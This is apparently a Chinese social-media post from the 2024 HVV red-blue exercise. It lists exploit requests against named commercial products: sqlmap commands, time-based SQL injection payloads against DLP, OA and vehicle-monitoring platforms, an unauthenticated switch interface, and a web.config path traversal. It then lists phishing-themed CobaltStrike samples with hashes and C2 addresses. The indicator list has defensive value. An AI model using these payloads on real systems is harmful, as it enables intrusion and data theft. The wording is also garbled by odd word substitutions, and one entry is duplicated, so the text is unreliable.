python sqlmap.py -u "https://ip/ops/index.php?c =Reportguide&a =check rn"--data "check name =123&tagid =123" --skip-waf --random-agent --dbs --batch --force-ssl

万户 OA SQL 注入漏洞

python sqlmap.py -u"http://xxxxxxxxx/defaultroot/public/iWebOfficeSign/DocumentEdit_unite.jsp;?RecordID =1" --level 3 --dbs

锐捷 RG-NBS2026G-P 交流机 WEB 管理 ping.htm 未授权 访问漏洞

HVV2024 最新马脚情报 最新木马样本

访问接口/safety/ping.htm

通天星 CMSV6 车载视频监控平台 disable 存在 SQL 注入漏洞

GET/edu_security_officer/disable;download Logger.action?ids =1+AND+%28SELECT+2688+FROM+%28SELECT%28SLEEP%285%29%29%29kOIi%29 HTTP/1.1 Host:User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36

亿赛通数据透露防护(DLP)系统 NetSecConfigAjax SQL 注入 漏洞

POST /CDGServer3/NetSecConfigAjax;Service HTTP/1.1 Host:Content-Type: application/x-www-form-urlencodedcommand =updateNetSec&state =123';if (selectIS_SRVROLEMEMBER('sysadmin')) =1 WAITFOR DELAY '0:0:5'--

亿赛通数据透露防护(DLP)系统 NoticeAjax SQL 注入漏洞

POST /CDGServer3/NoticeAjax;Service HTTP/1.1 Host:Content-Type: application/x-www-form-urlencodedcommand =del Notice¬iceId =123';if (select IS_SRVROLEMEMBER('sysadmin')) =1 WAITFOR DELAY '0:0:5'--

天问物业 ERP 系统 AreaAvatarDownLoad.aspx 任意文件读 取漏洞

GET/HM/M_Main/InformationManage/AreaAvatarDownLoad.aspx?AreaAvatar =../web.config HTTP/1.1 Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36HW 最新木马样本集情报

2024 重点保障安全意识培训参会职员名单.zip

SHA256:c9d2dca72286c01e068b1995e3aa7772ff9686a492b89e8b8c7b0ecaf715cf40

MD5:eb97e771dc4dd54c18553471d5fe3bbb

C2:110.41.46.45:9111

攻击手腕:Rust、APC 调用 CobaltStrike 木马

关于 2024 年公司财务调度的关照.exe

SHA256:d44f628b8e447249ef9ce8871350c52693c1f31cb126307be9f1b2c535053a4a

MD5:248b44673cbb0384180fc62ca972f018

来源:向日葵多协议 RDP 插件

关于 2024 攻防演习训练员工守则关照.exe

SHA256:bccd982dab220d22689cf81277789ef64b32f575a08f604e1a75da1d5d6aee10

MD5:1c26667276b0f3f69ab55bf8b34fdd22

C2:8.134.249.167:9099

攻击手腕:利用微信检测虚拟机 后门木马

集团“星火操持”推举学员参加选拔考试关照_docx.exe

SHA256:54a28a2bc66c4529aaf2c7b92d724f2a2943dcd12bb960f43e6d34cf90ace700

MD5:7c29a8b9e872af42b5d92dc98f87a917

C2:59.42.126.162:80

来源:CobaltStrike 木马

徐加李简历.docx.exe

SHA256:d86db50d6990d345a1280991b757c770b661d94592a68a95c48b189b7ac4bf50

MD5:b97e176e0ee5987ddfe98e056df343e9

SHA1:3bdde433ae2579d8270110fa6281e2feca7d6225

金融(渠道经理).zip

SHA256:431d010c90b451c107d4160bb134ff072cf8c7076f16ab516faa2d31ef3c4759

MD5:6330fab9ce531ce8943132272a3cb2a7

干系IP域名/C2:mobile.static.apiproxy.cloud.360.net/mobile.static.apiproxy.cloud.360.net.cdn.dnsv1.com:443

攻击手腕:域前置 CobaltStrike 木马

会议(去除 30 分钟限定).exe

SHA256:ac962605550d120d4d38ba87a10c87027c7ccb3f430475c0104646183bc6f825

MD5:2a04ff4412e48aabdc6fc073ae734cd2

C2:154.12.83.210:54123

攻击手腕:资源段解密实行 CobaltStrike 木马

有限公司社会招聘报名登记表.exe

SHA256:02bbeb4d9d6f13fe1db44a0a2da572b1596d9ff59b79376e8afaeab0ba76a1d6

MD5:09c7199b2bcd0d908a2b8d6867a1b240

C2:2gwxrah28rj0z.cfc-execute.bj.baidubce.com

攻击手腕:垃圾代码耗时、Rust CobaltStrike 木马

第三周周报.exe

SHA256:090a42171e42477dbcf0d02a4e901e8eb20cfde8c1765c9a67a84bafd256b2a4

MD5:5cd7b3e9950c5169a5278bdee38438ef

C2:2gwxrah28rj0z.cfc-execute.bj.baidubce.com,downloadlog.oss-cn-chengdu.aliyuncs.com

攻击手腕:go 编译,从工具存储中获取到加密载荷 CobaltStrike 木马

测试 tdp (2).zip

SHA256:13d7483a1f1a0b72aaa09ec985797556eeb402c893013a5bc08b706300c5bb3d

MD5:e2eba605cf1b6822e1bd9cb06bd334db

C2:101.200.150.8:8089

攻击手腕:原版 CS CobaltStrike 木马

《关于集团网络资产评估管理有关事变的关照》.exe

SHA256:f1d4316a2c7bccf197ee6209389fe1ad7aef8a3b94aebae5548c8d1a05f036cd

MD5:1b50d0cc313552072462327588f93a49

C2:117.50.187.104:443

来源:CobaltStrike 木马

对付有限公司的异议书.exe

SHA256:7b9c13919a006396b8c60eeaa54bd5728ef70aa7b7890232f3752506243a3e66

MD5:32a8cade2024195a71aeb1ebbd1c296f

C2:175.178.226.246:33333

来源:CobaltStrike 木马

artifact.exe

SHA256:c716ebfc4ae128c5d3b5a882683d7ca833bc4f339909cba4153425d4df765954

MD5:9974ad03575c5a8bfae6f2bb787321ea

C2:39.101.122.168:89

来源:CobaltStrike 木马

做事平台-存在弱口令漏洞.exe

SHA256:2358438e0c5931b12b2233d449354d3db21e17c350fdf171298c6665514bc655

MD5:aef9c59cb030b7e4038ca9850c95f8a2

C2:www.tencentcloud.site

攻击手腕:白加黑 CobaltStrike 木马

杨.rar

SHA256:7a5fdc1afaadd9d3673b922c45d65061b0ac01f9ffce6b0aec1126d843561f72

MD5:6a0427a10e8e51b1db6c5670fe071f82

干系IP域名:36.249.64.101:443(CDN),www.jinsixian.cn(Host)

攻击手腕:域前置 CobaltStrike 木马

做事平台-存在弱口令漏洞.exe

SHA256:2358438e0c5931b12b2233d449354d3db21e17c350fdf171298c6665514bc655

MD5:aef9c59cb030b7e4038ca9850c95f8a2

C2:www.tencentcloud.site

攻击手腕:白加黑 CobaltStrike 木马

Desktop.exe

SHA256:ce19a3062a20d0f2b0bc2a774c11912214aba6e27a191ae31bb96bf6610ca765

MD5:65c7f30fde67152da3176a8b55577acc

C2:101.132.194.179:8081

来源:CobaltStrike 木马

edragent

SHA256:e3ef6b7090bba1ca1590f09538f2261d78dbfbea1435dd99b1e8e12e1636bbe5

MD5:a7a2d23e0b1941876d043f0af6e71110

C2:139.196.210.163:50010

来源:CobaltStrike 木马

#网络安全##头条创作寻衅赛##国际网络安全热点资讯#